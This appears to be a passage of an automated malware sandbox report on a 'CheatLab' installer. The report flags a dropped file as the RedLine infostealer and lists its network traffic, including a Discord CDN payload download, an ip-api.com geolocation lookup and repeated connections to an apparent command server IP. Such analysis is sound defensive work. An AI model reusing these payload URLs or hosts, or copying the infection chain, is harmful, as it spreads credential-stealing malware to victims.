https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: LuaJIT.exe.1.drString found in binary or memory: https://luajit.org/
                    Source: connect.exe.9.drString found in binary or memory: https://sectigo.com/CPS0
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: https://www.advancedinstaller.com
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: https://www.thawte.com/cps0/
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
                    Source: unknownDNS traffic detected: queries for: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1User-Agent: SunCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=vzDilFX81rCrohiK_cZRBQnHBqHe6JFSPhjTxmdCqDE-1699058122-0-AcLNLQSLjqqaZzelUcLoZwHhxs7Mf6nWVkiH6CXWVvIrpbuioE6k9W3MZAlLzF8K9Y8kKxs8tluEsFIYrhg9eH4=; _cfuvid=OLsD0ow_yPIGa0RwhYfCL4rW0rvKLFQKwVPlV1avm30-1699058122773-0-604800000
                    Source: global trafficHTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1Content-Type: application/jsonUser-Agent: SunHost: ip-api.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1Content-Type: application/jsonUser-Agent: SunHost: cdn.discordapp.comCache-Control: no-cache
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49738 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 22.2.connect.exe.21f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 22.2.connect.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Drops large PE files
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile dump: connect.exe.9.dr 1070058901Jump to dropped file
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_005E6A505_2_005E6A50
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_0061F0325_2_0061F032
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_0060E2705_2_0060E270
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_0060C2CA5_2_0060C2CA
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_006192A95_2_006192A9
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_006184BD5_2_006184BD
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_0060A5875_2_0060A587
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_005EC8705_2_005EC870
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_006049205_2_00604920
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_0060A9155_2_0060A915
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_00610A485_2_00610A48
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_005E9CC05_2_005E9CC0
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_00615D6D5_2_00615D6D
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_3_00007FF736E28F7911_3_00007FF736E28F79
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_3_00007FF736E28F8B11_3_00007FF736E28F8B
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723ACA4011_2_00007FF7723ACA40
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77244B44811_2_00007FF77244B448
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77242516011_2_00007FF772425160
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723E118011_2_00007FF7723E1180
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77244518411_2_00007FF772445184
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7724631F411_2_00007FF7724631F4
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77246175C11_2_00007FF77246175C
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77245574011_2_00007FF772455740
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77242991011_2_00007FF772429910
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77244B8FC11_2_00007FF77244B8FC
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7724555C411_2_00007FF7724555C4
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723FF65011_2_00007FF7723FF650
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723DD6B011_2_00007FF7723DD6B0
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77245B6BC11_2_00007FF77245B6BC
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772409B6011_2_00007FF772409B60
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772447B6011_2_00007FF772447B60
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723B1B5011_2_00007FF7723B1B50
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772437BF411_2_00007FF772437BF4
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77246BBD811_2_00007FF77246BBD8
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723D3C6011_2_00007FF7723D3C60
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772447C7C11_2_00007FF772447C7C
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77239BC3011_2_00007FF77239BC30
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77243797011_2_00007FF772437970
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77244792411_2_00007FF772447924
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77239BA9011_2_00007FF77239BA90
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772447A4011_2_00007FF772447A40
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723DBAD011_2_00007FF7723DBAD0
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77245FF7011_2_00007FF77245FF70
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77240C00011_2_00007FF77240C000
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7724380F811_2_00007FF7724380F8
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772437E9011_2_00007FF772437E90
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77243837411_2_00007FF772438374
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77245C47C11_2_00007FF77245C47C
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7724504E811_2_00007FF7724504E8
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77243C4CC11_2_00007FF77243C4CC
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723D229011_2_00007FF7723D2290
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7724582B011_2_00007FF7724582B0
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723E287E11_2_00007FF7723E287E
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77245482811_2_00007FF772454828
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7724628FC11_2_00007FF7724628FC
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77242453011_2_00007FF772424530
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77243865411_2_00007FF772438654
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772438C1411_2_00007FF772438C14
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723A6BC011_2_00007FF7723A6BC0
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772462C7411_2_00007FF772462C74
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772444C8411_2_00007FF772444C84
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77245ACB011_2_00007FF77245ACB0
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77243894811_2_00007FF772438948
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7724629E011_2_00007FF7724629E0
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723A6A0011_2_00007FF7723A6A00
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77242AB0011_2_00007FF77242AB00
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF772456FC411_2_00007FF772456FC4
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77244708011_2_00007FF772447080
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77240AD6011_2_00007FF77240AD60
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77243CD1C11_2_00007FF77243CD1C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE47CA4017_2_00007FF6DE47CA40
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE52FF7017_2_00007FF6DE52FF70
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4DC00017_2_00007FF6DE4DC000
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE5080F817_2_00007FF6DE5080F8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE507E9017_2_00007FF6DE507E90
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE517B6017_2_00007FF6DE517B60
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE481B5017_2_00007FF6DE481B50
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4D9B6017_2_00007FF6DE4D9B60
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE46BC3017_2_00007FF6DE46BC30
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE53BBD817_2_00007FF6DE53BBD8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE507BF417_2_00007FF6DE507BF4
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE517C7C17_2_00007FF6DE517C7C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4A3C6017_2_00007FF6DE4A3C60
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE50797017_2_00007FF6DE507970
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE46BA9017_2_00007FF6DE46BA90
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE517A4017_2_00007FF6DE517A40
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4ABAD017_2_00007FF6DE4ABAD0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE53175C17_2_00007FF6DE53175C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE52574017_2_00007FF6DE525740
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4F991017_2_00007FF6DE4F9910
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE51792417_2_00007FF6DE517924
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE51B8FC17_2_00007FF6DE51B8FC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE5255C417_2_00007FF6DE5255C4
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4AD6B017_2_00007FF6DE4AD6B0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4CF65017_2_00007FF6DE4CF650
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE52B6BC17_2_00007FF6DE52B6BC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE51B44817_2_00007FF6DE51B448
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4B118017_2_00007FF6DE4B1180
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE51518417_2_00007FF6DE515184
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4F516017_2_00007FF6DE4F5160
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE5331F417_2_00007FF6DE5331F4
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE526FC417_2_00007FF6DE526FC4
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE51708017_2_00007FF6DE517080
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4DAD6017_2_00007FF6DE4DAD60
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE508C1417_2_00007FF6DE508C14
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE476BC017_2_00007FF6DE476BC0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE52ACB017_2_00007FF6DE52ACB0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE514C8417_2_00007FF6DE514C84
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE532C7417_2_00007FF6DE532C74
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE50CD1C17_2_00007FF6DE50CD1C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE50894817_2_00007FF6DE508948
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE476A0017_2_00007FF6DE476A00
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE5329E017_2_00007FF6DE5329E0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4FAB0017_2_00007FF6DE4FAB00
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE52482817_2_00007FF6DE524828
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4B287E17_2_00007FF6DE4B287E
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE5328FC17_2_00007FF6DE5328FC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE50865417_2_00007FF6DE508654
